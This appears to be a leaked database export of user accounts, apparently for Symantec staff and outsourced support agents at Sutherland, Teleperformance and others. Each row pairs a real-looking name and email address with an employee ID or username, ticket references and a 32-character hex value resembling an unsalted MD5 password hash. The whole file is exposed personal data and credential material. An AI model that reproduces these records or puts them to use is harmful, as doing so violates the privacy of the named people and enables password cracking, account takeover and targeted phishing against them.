add6-49a8-8a37-73d8d82880ca,<blank>,<blank>,Magali_Signourel@symantec.com,<blank
>,8168505f1eecebaec486be4a80d18513,Signourel,<blank>,Magali_Signourel,Magali,NUL
L,NULL,NULL
e8b6-43c2-bbea-9520668e1fd0,SSS 23.02.10,EMPROV,tools_id@symantec.suth.com,Suthe
rland,84039b427e58edf53769bad7b28ab294,Raphael,<blank>,099691,Martin ,NULL,NULL,
NULL
1a1-4abd-aff8-912ac71690aa,<blank>,071060,nstavropoulos@symantec.teleperformance
.gr,TPG,a1486c215cb503aa2d3517316c656f96,Stavropoulos,<blank>,nikolaos_stavropou
los,Nikolaos,NULL,NULL,NULL
f8fd-4bb6-b74b-50ded0ee4e99,bpr-22-04-10,inc158054,tools_id@symantec.suth.com,su
therland,7ada7e3e27aae8728e0eeaf19981e16a,Jayan,<blank>,086487,Arjith,NULL,NULL,
NULL
dd4-4eef-9016-b13d1d269862,<blank>,067005,spapazisi@symantec.teleperformance.gr,
TPG,c04a214172125650e8107bce24c8fc58,Papazisi,<blank>,sofia_ papazisi,Sofia,NULL
,NULL,NULL
04c-4739-ab00-303dcb9a28bb,<blank>,071065,smontani@symantec.teleperformance.gr,T
PG,72c136c552f11af6fe99b3d245643de7,Montani,<blank>,stefano_montani,Stefano,NULL
,NULL,NULL
23b-46e0-be74-7afcdd932941,<blank>,072222,tkaravokyros@symantec.teleperformance.
gr,TPG,9bd2f6af1b981ce6852cb06c8d5687cc,Karavokyros,<blank>,th\xe9melis_karavoky
ros,Th\xe9melis,NULL,NULL,NULL
a02-47dd-b693-c8343543e6b1,<blank>,85676,Tools_id@symantec.suth.com,Sutherland G
lobal Services,d4a1b4d797b90a6eff13143f3740cc04,Trebic,<blank>,tammy_trebic,Tamm
y,NULL,NULL,NULL
514e-4056-8561-e4dc3bbd9f0f,<blank>,<blank>,tools_id@symantec.suth.com,Sutherlan
d,71ae46fd7afeb20e90959b999eb61360,Chitnis,<blank>,121276,Aniket,NULL,NULL,NULL
821-4412-9612-b7d1dca269e5,<blank>,080150,Symantec_TL@teleperformance.se,Archive
d Teleperformance Nordic,bea7a52e9ef634e56374ebc3d3d0f519,Sorensen,<blank>,keld_
sorensen,Keld,NULL,NULL,NULL
d79e-4088-b49a-310b1d2beb36,<blank>,<blank>,tools_id@symantec.suth.com,Sutherlan
d,9aaa97f7762570b0805ecda770906e80,Rao,<blank>,121277,Vishwa Prasad,NULL,NULL,NU
LL
e89-4e81-b8f6-ac5d0dec6961,<blank>,<blank>,Tools_id@symantec.suth.com,"Sutherlan
d Global Services, Inc.",052ad3712bdd483629751dcc286e4156,Wilson,<blank>,Stephai
ne_Wilson,Stephaine,NULL,NULL,NULL
9445-477f-b284-dacfb1afcfe5,<blank>,<blank>,tools_id@symantec.suth.com,RM-Jan25-
2012-CRQ000000522682,bb1c0e633ef68c91049773db10122feb,Bhandari,<blank>,124282,Vi
nayak ,NULL,NULL,NULL
3ed7-482c-b222-9fd05a131c0f,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 3-
2012-CRQ000000539178,9e577754d44914294c20259876e14a9a,Lizardo,<blank>,124531,Jar
ed ,NULL,NULL,NULL
a5d0-4a3d-a91b-9033df937e6d,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 3-
2012-CRQ000000539181,7f3cabd90144fc76eccb88664ce3556f,Marfil,<blank>,124532,Mayl
a,NULL,NULL,NULL
4867-4987-9c94-59540eecd5b6,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 3-
2012-CRQ000000539196,1b6c3401fe995436942c2c7efa91fc4d,Leo Anoling,<blank>,124537
,Louie,NULL,NULL,NULL
7bb-4316-bade-23d64d075f65,<blank>,86196/2632350,Tools_id@symantec.suth.com,"Sut
herland Global Services, Inc.",274b88855cb9bb4fb3620fd1b6edee2c,Duvvi,<blank>,pr
asad_duvvi,Prasad,NULL,NULL,NULL
039a-42c5-a619-664ec0bf23fd,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 3-
2012-CRQ000000539214,806e85ebd60563f4725614c9fb2fe7f5,Marie Vivar,<blank>,124543
,Shiela,NULL,NULL,NULL
b0c6-440d-a245-eaa37ab47b5d,<blank>,<blank>,roland_wang@symantec.com,Symantec,08
19af0b475d1ac24a327ab07dfb4a35,Wang,<blank>,roland_wang,Roland,NULL,NULL,NULL
bc6d-4a97-8900-1cb5de5a13d5,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 3-
2012-CRQ000000539220,07863aa151b0bb65eb1a1a837e8d6f9e,Salas,<blank>,124545,Maril
yn,NULL,NULL,NULL
693a-4b09-9b0f-94f047f18572,CRQ000000280300,<blank>,tools_id@symantecsuth.com,SP
16 Jun 2011,38f3d7c8d357d448ff8701dae47cd9de,S,<blank>,116667,Ganesan,NULL,NULL
,NULL
9293-4a1e-9314-280c9aaac907,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
725204 - PR - 10th July 2012,c3ca622f163c75991deb13de4c90535f,Mirasol,<blank>,22
6486,Alma Diana ,NULL,NULL,NULL
3eb9-4d46-bfab-ebe520ac070b,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,ed7e80f2a20262895d6790537b4ff972,Lam,<blank>,094377,Sunil Kumar,NULL,NULL,NULL
400f-483d-a1ae-f8a7af64de13,CRQ000000229420,<blank>,tools_id@symantec.suth.com,K
SC-03/30/2011,cdc9ac82de0f4698b9d5d2eca5df0318,PatinganKo,<blank>,106067,RonaldS
ewell,NULL,NULL,NULL
7f37-4e77-9054-eca0199a03f2,CRQ000000725693--vmd--10/07/2012,<blank>,Arno.schorm
ans@teleperformance.nl,teleperformance,53ec047cfe5f8730ce1662bd6c5d4919,Schorman
s,<blank>,227849,Arno,NULL,NULL,NULL
2885-4f8c-b115-8d88e23f6c9f,<blank>,<blank>,bjorn.preus@teleperformance.nl,PM -
10/10/2012 - CRQ000000832014,bb6db1e44e84b31f7dd3a8c464b30ed9,Preus,<blank>,2307
94,Bjorn,NULL,NULL,NULL
e5f2-46ea-b386-52f1ffdaac9a,<blank>,<blank>,jean-paul.indebraekt@teleperformance
.nl,PM - 10/10/2012 - CRQ000000832029,dfa5c8dc331d38ae0879c9d3dee6c8e1,In de Bra
ekt,<blank>,230795,Jean-Paul,NULL,NULL,NULL
da24-49ad-8698-180218623d52,<blank>,<blank>,ravi_murthydk@symantec.com,CRQ000000
230165 - PR - 4/1/2011,85e3c39c5acee224c22523953657e613,MurthyDK,<blank>,092163,
Ravi,NULL,NULL,NULL
c9bd-40e4-99ec-39f08709f809,<blank>,<blank>,manfred.wahl@teleperformance.nl,PM -
10/10/2012 - CRQ000000832051,93ade96d8f1997bd29e3541ed498a4b6,Wahl,<blank>,2307
97,Manfred,NULL,NULL,NULL
97cd-4442-8280-3c82d37320ec,<blank>,<blank>,pim.campers@teleperformance.nl,PM -
10/10/2012 - CRQ000000832064,2863f72dd10f3ef8a79e6dcd29dcf66c,Campers,<blank>,23
0801,Pim,NULL,NULL,NULL
510-435b-ace9-d445324252cf,<blank>,2630245,Tools_id@symantec.suth.com,"Sutherlan
d Global Services, Inc.",8fc71e131c97ecb056ef1e9adfab5b3b,Palamides,<blank>,Mark
_Palamides,Mark,NULL,NULL,NULL
8e52-4b53-b951-0ccc6be3511a,25/01/2010 - SPJ,EMPROV,Tools_Id@Symantec.Suth.Com,S
utherland,4d6d3214322ef6d6408d5bf611f6db28,Alsisto,<blank>,098815,Jeana Mariz R,
NULL,NULL,NULL
9a0-44d0-9761-08c0c4cc3819,<blank>,2630245,Tools_id@symantec.suth.com,"Sutherlan
d Global Services, Inc.",5a15aca4d09e05f942133fff3cee124f,Meloche,<blank>,Michae
l_Meloche,Michael,NULL,NULL,NULL
5830-479c-850e-1527a2bca8bf,<blank>,<blank>,ajindar_tr@symantec.com,CRQ000000230
165 - PR - 4/1/2011,d6360bdcc376404b3b4806da0ca40bdf,TR,<blank>,090007,Ajindar,N
ULL,NULL,NULL
e42f-4dd8-9121-89742ccd322b,INC213497,nam 07/15/2010,tools_id@symantec.suth.com,
Sutherland,dae9e6f97d22932a64e61f30ec405bc8,Khan,<blank>,098109,NasimullahHamidu
llah,NULL,NULL,NULL
4763-4f9d-b915-c4e0af511842,<blank>,EMPROV,Tools_Id@symantec.Suth.com,Sutherland
,e201aefd999de72e4bea2428bb20e592,Chetty,<blank>,075748,Srinivas,NULL,NULL,NULL
359-4de2-8052-48e9d149bc7b,<blank>,2630245,Tools_id@symantec.suth.com,"Sutherlan
d Global Services, Inc.",1e11169e469d16cf158f1a38c3ec07bf,Hobbs,<blank>,Julie_Ho
bbs,Julie,NULL,NULL,NULL
1dd7-411e-a6d1-701790ba8ce3,<blank>,<blank>,Michael_dempsey@symantec.com,Symante
c,243229559d67031a460a91119aef4e0a,Dempsey,<blank>,michael_dempsey,Michael,NULL,
NULL,NULL
e776-4763-98d7-31b58839cc4a,CRQ000000228849,<blank>,tools_id@symantec.suth.com,K
SC-03/29/2011,1f969be2f8f606fb2c37de85f6a6b876,SR,<blank>,099600,Karthick,NULL,N
ULL,NULL
02ba-47ee-aa65-1b405a5abb75,CRQ000000532045 - CLNP Jan 31 2012,000-0000,tools_id
@symantec.suth.com,Sutherland,cb147aff795f31aa1b6e552729a3d2b8,Panchal,<blank>,1
24440,Devendra,NULL,NULL,NULL
d5c1-455a-814f-fd1b74be806d,CRQ000000228849 PBP 29/03/2011,<blank>,tools_id@syma
ntec.suth.com,Sutherland,7da518dbe04d7e9f3460a71ebfa86b85,SacayMaglanoc,<blank>,
101750,PatrickDave,NULL,NULL,NULL
fd43-46ab-8fca-4c22ffba310c,bpr-27-05-10,INC182175,tools_id@symantec.suth.com,su
therland,21713000f547ba8e0e629a997ff5e27a,Verzosa,<blank>,089684,Moonyeen P,NULL
,NULL,NULL
c39f-474e-b029-44efa238f8ab,INC213497,nam 07/15/2010,tools_id@symantec.suth.com,
Sutherland,2aa5a2f0b735756ebd6e7e7e76536443,Raj,<blank>,090335,Rahul,NULL,NULL,N
ULL
86f9-4c58-b2a9-d77e126c8152,CRQ000000228849 PBP 29/03/2011,<blank>,tools_id@syma
ntec.suth.com,Sutherland,91dfa7bd38e8fb7c677bc48890473b25,Pichon,<blank>,111753,
Lourdes,NULL,NULL,NULL
a4c-4d26-b8c9-745d6903da30,<blank>,2630245,Tools_id@symantec.suth.com,"Sutherlan
d Global Services, Inc.",9278953a67d58251fbc26f012a0e610f,Meyers-Pillo,<blank>,S
cott_MeyersPillo,Scott,NULL,NULL,NULL
294-4a4d-a0ff-8ab9f0d16608,<blank>,EMPROV,symaccount@ipcdoctor.co.kr,PCDoctor,8a
ae744c2ba26acdb414bd746f1fb2b3,Hamada,<blank>,076500,Sachin ,NULL,NULL,NULL
da3f-4839-bb3d-0e5258535640,CRQ000000229420,<blank>,tools_id@symantec.suth.com,K
SC-03/30/2011,3719b0f1170d4c68a087d52adcfdf6c1,Balbin,<blank>,109105,Ariel Bujal
a,NULL,NULL,NULL
29b3-468c-b70f-21b3a8d5498c,CRQ000000229420,<blank>,tools_id@symantec.suth.com,K
SC-03/30/2011,7cd4b6110c225edcb56f2aca0eb85096,MaeCalatrava,<blank>,106063,Rashe
ll,NULL,NULL,NULL
38dc-46d7-9543-4992a95fafa7,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,0c4ce1145f7e8b79a71f072264bfd9d9,Papak,<blank>,091792,Lucie,NULL,NULL,NULL
c158-423d-bb5b-f9bb370384f3,CRQ000000229420,<blank>,tools_id@symantec.suth.com,K
SC-03/30/2011,936ea10aad38acd8ffb3677c17f91806,Mathew,<blank>,087476,Vijy,NULL,N
ULL,NULL
3943-476c-a66c-eae83255dd0f,CRQ000000221803 PBP 17/03/2011,<blank>,tools_id@syma
ntec.suth.com,Sutherland,7718fd3356e2bdc7374438c72b9251d4,Balu,<blank>,113993,An
and,NULL,NULL,NULL
c174-437c-a2d0-4f7985dcebd4,CRQ000000322807-CLNP-18/08/2011,000-0000,renukarajde
o_yadav@symantec.suth.com,Sutherland,03a9567df421b0c26876338ba7e80e13,Yadav,<bla
nk>,119701,Renuka Rajdeo,NULL,NULL,NULL
0813-4513-bfcc-df99baf4e4a3,CRQ000000532042 - CLNP Jan 31 2012,000-0000,tools_id
@symantec.suth.com,Sutherland,9a28e4ab6620b306e5cf7f0d5b01c337,Logde,<blank>,124
439,Fahmi,NULL,NULL,NULL
07a-4820-8df6-71c3085d94fc,<blank>,86006,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",4fe456c4c72b515669b7cfcfaef99bbc,Chandra Sekeran,<blank>,
prakash_chandraseker,Prakash,NULL,NULL,NULL
99a7-4b4d-8ad9-d4ff5956240b,CRQ000000725701--vmd--10/07/2012,<blank>,jermey.kaln
ins@teleperformance.nl,teleperformance,9c2d2e6aec8f8baa13fb1236e13ad10f,Kalnins,
<blank>,227850,Jeremy,NULL,NULL,NULL
c49-469b-bc11-dcc9e372f292,<blank>,2630245,Tools_id@symantec.suth.com,"Sutherlan
d Global Services, Inc.",3d9e00346b867614524aea69c794f701,Grozelle,<blank>,Jenni
fer_Grozelle,Jennifer,NULL,NULL,NULL
7551-4360-a55a-7b1627337f23,CRQ000000322818-CLNP-18/08/2011,000-0000,naseerahmed
_shaikh@symantec.suth.com,Sutherland,b0279f00b97665a3b50c104a2b20bc8f,Shaikh,<bl
ank>,119704,Naseer Ahmed,NULL,NULL,NULL
564-4457-97be-e39227b05bb7,<blank>,86328/2633284,Tools_id@symantec.suth.com,"Sut
herland Global Services, Inc.",26835a9b29ad494c773f7a797a6899b9,Nishad,<blank>,a
vinash_nishad,Avinash,NULL,NULL,NULL
c29d-47f5-a560-d27ffe243409,CRQ000000267519--vmd--31/05/2011,<blank>,MaheshKumar
_D@symantec.com,<blank>,0baba96ce4bf7f5c41d4ad058462241b,Kumar D,<blank>,115651,
Mahesh,NULL,NULL,NULL
460d-4126-a196-f329733ece43,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
267713 - PR - 5/31/2011,9ea55ca5e6a29c46d2cf22aea305c057,Abas,<blank>,116675,Rut
chiebel Gavilan,NULL,NULL,NULL
08a-4db4-99c9-a256ca768603,<blank>,2630245,Tools_id@symantec.suth.com,"Sutherlan
d Global Services, Inc.",dc926e56890b8e2e214f569cd874b815,Mailey,<blank>,Megan_M
ailey,Megan,NULL,NULL,NULL
782d-41f2-aa15-67a40affa71a,PM - 6/23/2011 - REQ000000887994,<blank>,tools_id@sy
mantec.suth.com,<blank>,82befb69256489c98e45a798e84d72ba,B,<blank>,117609,Javeed
,NULL,NULL,NULL
66dc-4f39-a624-b2fb4fa63c59,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
267270 - PR - 5/30/2011,1862f43d3d5b2f9e628c1af68c007365,Nagareddy,<blank>,11137
9,Venkata Subrahmanya Kumar,NULL,NULL,NULL
752c-42f5-ab0e-9a8a04e9e330,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 3-
2012-CRQ000000539172,a9a6570830cd691f6208a90ce2fc8fc0,Gatmaitan,<blank>,124523,N
oel,NULL,NULL,NULL
b34-4292-b170-ef2ca13f053f,<blank>,2630245,Tools_id@symantec.suth.com,"Sutherlan
d Global Services, Inc.",abaff153342ffb0e89f6150a9e520452,Abuzaid,<blank>,Nada_A
buzaid,Nada,NULL,NULL,NULL
5c9e-4c71-95af-4b2208bdf9ae,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 3-
2012-CRQ000000539184,3fd0a423ed7d1917f4f496a6901bd4e2,Jill Oesmer,<blank>,124534
,Diana,NULL,NULL,NULL
bd0-4eb6-839b-bfadf8efbe72,<blank>,<blank>,steve_burns@symantec.com,Symantec,7bd
9ae00a7b584f630bd320b566b2ae2,Burns,<blank>,steve_burns,Steve,NULL,NULL,NULL
73f6-4070-aef2-79c52cf0fe16,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 3-
2012-CRQ000000539203,cb9bf8649eb50e350f21869084199ef1,Cabebe,<blank>,124540,Jose
ph ,NULL,NULL,NULL
5b94-4116-a55e-9820a8e544ca,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 3-
2012-CRQ000000539211,dd54b4bfb56b98820873eb339bb026d5,Therese Paular,<blank>,124
541,Jean,NULL,NULL,NULL
6c5b-4f3d-8e0b-e1e4b9d72ffc,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 3-
2012-CRQ000000539217,677e4b607054ddb00a3fcbc0855bf529,Jean Saquilayan,<blank>,12
4544,Dian,NULL,NULL,NULL
2cba-408b-9643-3cb13584fe40,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 3-
2012-CRQ000000539229,6c197d8c94183553cafbb2e81330165e,Rodrin,<blank>,124549,Redg
ie,NULL,NULL,NULL
804a-41b4-afe7-90cfb9970d28,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 3-
2012-CRQ000000539235,ab97af4d81325fce52c123fa28b5f363,Tatualla,<blank>,124552,Jo
sephine,NULL,NULL,NULL
8ed-4acd-8173-89c092a450be,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland,
c40dedfb1fd21d1012bb149270e3fa75,Somasundaram,<blank>,086512,Nithin,NULL,NULL,NU
LL
97c3-4937-9336-38b57784a3e8,BPR-11/12/09,EMPROVINC70690,Tools_Id@symantec.Suth.c
om,Sutherland,61f08a38470ab6bebd9b3a9c1ada2710,A,<blank>,091722,Nagarani,NULL,NU
LL,NULL
cd3d-4eec-90e8-05284a7c0c4d,SSS 12/01/10,EMPROV,tools_id@symantec.suth.com,Suthe
rland,5fcc6e887a310ab8c55837680c939fa5,Eragula,<blank>,098397,Sharath,NULL,NULL,
NULL
bdf4-4149-b861-162ff1ea8bc2,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
267805 - PR - 5/31/2011,0cafb902d69809cee65b775de3d0d465,Hubag,<blank>,116700,Ed
heart B.,NULL,NULL,NULL
e2eb-4293-bb11-3daf0e81f107,CRQ000000518278--vmd--24/01/2012,000-000,tools_id@sy
mantec.suth.com,Sutherland,4115ef8318de3cd474e7ec466ec73578,FAgunod,<blank>,0997
47,John Andre,NULL,NULL,NULL
abc3-41fc-81ab-e844102a2930,"CRQ000000725712 CLNP July 10,2012",999-999-9999,Mau
rice.scheepers@teleperformance.nl,Teleperformance,27a233723fddbf4d624d7c9dcd41fa
d1,Scheepers,<blank>,227852,Maurice,NULL,NULL,NULL
6e8-4d5e-9a43-c492a522358d,<blank>,2630245,Tools_id@symantec.suth.com,"Sutherlan
d Global Services, Inc.",d0585ca7e0e492888a32cdf324228c8f,Rainey,<blank>,Scott_R
ainey,Scott,NULL,NULL,NULL
70a-4c76-89d2-cec5042c25f2,<blank>,2630245,Tools_id@symantec.suth.com,"Sutherlan
d Global Services, Inc.",1274043dd485769a580767675dceabb8,Oltean,<blank>,Shane_O
ltean,Shane,NULL,NULL,NULL
5fec-4b3a-b8d7-8378499ed423,28/01/2010-SPJ,EMPROV,Tools_Id@Symantec.Suth.com,Sut
herland,52d3bd90682d6878ed1d4e41f3646281,Bhatnagar,<blank>,091740,ShivkantCS,NUL
L,NULL,NULL
b9f4-4b8c-9574-8ef8fb4f48b8,BPR-13-01-10,EMPROV/INC87845,accounts@symantec.telep
erformance.gr,Teleperformance,d09c7ca28506e62186b97721ff7f43d5,Yerbanga,<blank>,
071066,Theophile,NULL,NULL,NULL
4a13-4d4e-a447-280ead2f5622,AY 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,9442cb4b033c3baf6de9f01187bcc6d1,Balla,<blank>,074211,Ramesh,NULL,NULL,NU
LL
f88-4e8b-b1ec-2648c2a83e9b,<blank>,<blank>,bob.savelson@siberlogic.com,SiberLogi
c,dcf267858e8979a38d097f5088edc971,Savelson,<blank>,siber_safe,Bob,NULL,NULL,NUL
L
e78-47db-951a-32b354158d05,<blank>,<blank>,Tools_id@symantec.suth.com,"Sutherlan
d Global Services, Inc.",a3320af00d4902b976c7650c0e544493,Buis,<blank>,Belinda_B
uis,Belinda,NULL,NULL,NULL
a0aa-44eb-86b9-f41a81ef12cc,nam-08-31-10,INC000000254496,tools_id@symantec.suth.
com,Sutherland,c70466bd37ca2d517a8129ea48504396,Ramaswam Kumar,<blank>,074077,Sa
thish,NULL,NULL,NULL
dd6-4006-859e-3d78276eb658,WS 16-07-2010,INC213497,Tools_id@symantec.suth.com,"S
utherland Global Services, Inc.",37b6b60558d9617571ccdbfecd2d51f4,Shiva Gopal,<b
lank>,archana_shivagopal,Archana,NULL,NULL,NULL
0d44-4bb1-846d-46de4ba4ceaa,<blank>,EMPROV,Tools_Id@symantec.Suth.com,Sutherland
,df56a2a49a4280b50e509735125f0412,Joseph,<blank>,096253,Philip,NULL,NULL,NULL
971f-4ebb-8206-2ae7a0cd0c60,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
267270 - PR - 5/30/2011,583e7653d1d267bf04681ecaa17aee25,LopezTalastas,<blank>,0
97487,Celyn Katrina,NULL,NULL,NULL
c9ff-47b4-82e3-05510096eebf,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,9
a08a8e5de4411154f97e6fcd6640e21,Jadhav,<blank>,111140,Rohan,NULL,NULL,NULL
8961-487c-8cb7-b03058cdba61,<blank>,EMPROV,symaccount@ipcdoctor.co.kr,PCDoctor,0
0aec095c02fcf0d6f3ccc05f182ed2c,Nishiwaki,<blank>,084525,Satsuki,NULL,NULL,NULL
1e8a-4c64-abce-8477de20a2aa,CRQ000000241079 PBP 15/04/2011,<blank>,Sathiyamoorth
y_K@symantec.com,Symantec,e98394f9fc4477f78ea0289109bbdced,K,<blank>,114448,Sath
iyamoorthy,NULL,NULL,NULL
b589-4ce4-90f5-85e9141d8607,<blank>,<blank>,diego.martin.pugliese@teleperformanc
e.com.ar,RM-3FEB 2012-CRQ000000540482,b8b3a3429628d24905e53f0dd046d0c2,Pugliese,
<blank>,124645,Diego Mart\xedn,NULL,NULL,NULL
ef22-41b3-b519-7cb88262d218,CRQ000000241079,<blank>,PRAKASH_R@symantec.com,ksc-0
4/15/2011,43217be5ca5b3b209c1accfb583a2d02,R,<blank>,114520,PRAKASH,NULL,NULL,NU
LL
337c-49c3-a9f5-8805cd35a0d7,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
267270 - PR - 5/30/2011,d84e705add20547aa3378610e5dab485,RafiqueA,<blank>,089491
,Mohamed,NULL,NULL,NULL
5216-414e-a59e-ab3292cc3240,CRQ000000241079 PBP 15/04/2011,<blank>,Sudheer_K@sym
antec.com,Symantec,d286410e6991f94e0790d0dd314c4b79,K,<blank>,114449,Sudheer,NUL
L,NULL,NULL
c843-4fc6-94b0-db884230705c,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,6
588c8e5186bcb988454b77e47b073c7,Wong,<blank>,111130,Jake Israel,NULL,NULL,NULL
9c48-4aab-8e59-d8c28ece6f64,CRQ000000241079,<blank>,Shanmugam_S@symantec.com,KSC
-04/15/2011,587dbc2c2c96cb5630c4223a0b0e4583,S,<blank>,114777,Shanmugam,NULL,NUL
L,NULL
b202-483e-82d2-8e42c93d4305,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
267270 - PR - 5/30/2011,2e0f1b34494de669e77765d0ff9f750f,Reddy,<blank>,111381,Te
jendra,NULL,NULL,NULL
06d6-47b7-916d-f75fa3c68e12,"CRQ000000725704 CLNP July 10,2012",999-999-9999,Arn
o.schormans@teleperformance.nl,Teleperformance,d91506b8eb8b6e2e2b331eb7e69d6c48,
Lochman,<blank>,227851,Libor,NULL,NULL,NULL
28d2-4158-8f42-f06df63044b9,PM - 5/20/2011 - CRQ000000261458,<blank>,tools_id@sy
mantec.suth.com,<blank>,1b9af243ff4ed71e3b26f1c18fcbc196,Kadve,<blank>,115858,Vi
nit,NULL,NULL,NULL
1cd4-4daf-822c-00520ae2d424,<blank>,<blank>,marco.janssen@teleperformance.nl,PM
- 10/10/2012 - CRQ000000832054,efc135da173bb2a3fed510b205405444,Janssen,<blank>,
230798,Marco,NULL,NULL,NULL
f11a-42e6-a4fa-9b74b418334f,SRB 24.05.2010,INC179290,Tools_ID@Symantec.Suth.com,
Sutherland,37f5f7e59fcfec7155ed5588a1ea3537,Taleon,<blank>,104913,Michael,NULL,N
ULL,NULL
c04-40fe-806f-40a6ddb037e3,<blank>,86243,Tools_id@symantec.suth.com,Symantec,725
fd8b93d1907798ceb9a40c29649ab,Kumar Kannappan,<blank>,sathishkumar_kannapp,Sathi
sh,NULL,NULL,NULL
fea9-4301-aff5-9732299e3734,<blank>,<blank>,michel.schoonderwaldt@teleperformanc
e.nl,PM - 10/10/2012 - CRQ000000832058,f28a3f86de7077d9e0a047a684d76069,Schoonde
rwaldt,<blank>,230799,Michel,NULL,NULL,NULL
1d23-46c7-b633-1860d8bf645c,PM - 5/20/2011 - CRQ000000261472,<blank>,tools_id@sy
mantec.suth.com,<blank>,3f0e4a22340ddea385aced8b6d46cb43,Lewis,<blank>,115861,Vi
ven,NULL,NULL,NULL
b2e8-407a-9783-dfde46f49713,<blank>,<blank>,patrick.timmers@teleperformance.nl,P
M - 10/10/2012 - CRQ000000832061,22de321081ed4176b1fbe231cc2aed41,Timmers,<blank
>,230800,Patrick,NULL,NULL,NULL
d1c-4625-af0c-73eb7f64c467,<blank>,86348,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",408690b2e623b72b7d45505e83a10b31,Phular,<blank>,rohit_phu
lar,Rohit,NULL,NULL,NULL
c1b8-4ee4-a585-f0868a1f7b23,CRQ000000265000--VMD--25/05/2011,<blank>,Prasanth_Th
ilak@symantec.com,SYMANTEC,222198462e9f1caa2ad3e9aeb2216136,Thilak,<blank>,11497
1,Prasanth,NULL,NULL,NULL
9c6a-49ed-aadd-fe1e064d6441,CRQ000000265000--VMD-25/05/2011,<blank>,S_Ekalaivan@
symantec.com,SYMANTEC,e2a1b70cfd19a1c1b9e3c3e15dbaccbb,Ekalaivan,<blank>,114523,
S,NULL,NULL,NULL
d7d9-438b-904f-593a1126ce80,tools_id@symantec.suth.com,000-000,tools_id@symantec
.suth.com,Sutherland,99f41a12df7a8334c2e828e7b935ce6d,T,<blank>,089277,VenuGopal
,NULL,NULL,NULL
7a72-466a-897a-d45583848f18,CRQ000000265666--vmd--26/05/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,df36cbb19a8f8b1d91f4ccf76478fccd,Kashyap,<blank>,0914
15,Samujjwal,NULL,NULL,NULL
2648-40e9-b2d4-b4a7394a31b8,CRQ000000321921--vmd--17/08/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,37afbc3102e133054745075bdf2a34f5,Singh,<blank>,119623
,Vikrant,NULL,NULL,NULL
d51-4f72-9639-60540cbf6ca0,<blank>,86775/2635091,Tools_id@symantec.suth.com,"Sut
herland Global Services, Inc.",357c43ce832ddf13040747c60dec7aa0,Shafi,<blank>,mu
hammed_shafi,Muhammed,NULL,NULL,NULL
e6a-4a2b-932d-86b1ba0727ab,<blank>,86840/2614952,Tools_id@symantec.suth.com,"Sut
herland Global Services, Inc.",52c254d9997009367ff7582efe393d7a,Ibero,<blank>,ke
nneth_ibero,Kenneth,NULL,NULL,NULL
c49f-4184-aa8c-7751c09c3f96,<blank>,+ 353 1 861 7152,Jason_Rickard@symantec.com,
Symantec,2bce0c19912effa343a82d184667f368,Rickard,<blank>,021433,Jason,NULL,NULL
,NULL
e986-4402-9667-254fb2dd64fd,<blank>,<blank>,kevin_kerwien@symantec.com,Symantec,
c8a32ad47cadfecf75db920092e9eb93,Kerwien,<blank>,kevin_kerwien_reporting,Kevin,N
ULL,NULL,NULL
4ea-49f8-86e5-84cea1575229,<blank>,86218,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",bbcb64103b06b5a0c401a2c34cd07593,Vijayan,<blank>,vipin_vi
jayan,Vipin,NULL,NULL,NULL
63c6-4cac-924a-86baca83a1ba,<blank>,<blank>,chintan_parmar@symantec.com,Symantec
,431b6c47138bb449b57520062c57b5df,Parmar,<blank>,chintan_parmar,Chintan,NULL,NUL
L,NULL
be5-4996-a6f6-68106e5b61b1,<blank>,89152,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",f9f0db5df58391c7030d39077b10edfb,Sukumaran,<blank>,anoopa
thiyarath_suku,AnoopAthiyarath,NULL,NULL,NULL
b776-4290-aa7a-208a1455e0bc,12/21/2009 - SPJ,INC76373,accounts@symantec.teleperf
ormance.gr,Teleperformance,9811c9058447cdb371d2efc09355c3f7,Wetshi Doka,<blank>,
082938,Alfred Okomba,NULL,NULL,NULL
968-4968-8b6b-0848f3148571,<blank>,89250,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",9d5464c356ceb69583b4464d90809b35,Kumar,<blank>,chaitanya_
kumar,Chaitanya,NULL,NULL,NULL
597a-469a-ac2b-62eb0cf7b509,WS 27-08-2010,INC000000251655,tools_id@symantec.suth
.com,<blank>,022997dd734ff1be63786c8370299172,Karumanchi,<blank>,091807,Satish K
umar,NULL,NULL,NULL
7413-4b21-8c5b-436afc635041,WS 31-08-2010,INC000000254152,Viona_Lam@symantec.com
,<blank>,3f5f45f0aeb7f684642752446788bb79,Lam,<blank>,viona_lam,Viona,NULL,NULL,
NULL
0b0b-446e-9cc8-06e6d02ad3d3,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,8c5877faf84cd4f0727e00a60981d0ca,Mateo,<blank>,096047,Ace,NULL,NULL,NULL
bc3c-4b9d-b712-c08064803cc9,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,c7580798122f9079e65565168c388f73,Taniog,<blank>,096041,Aileen,NULL,NULL,NULL
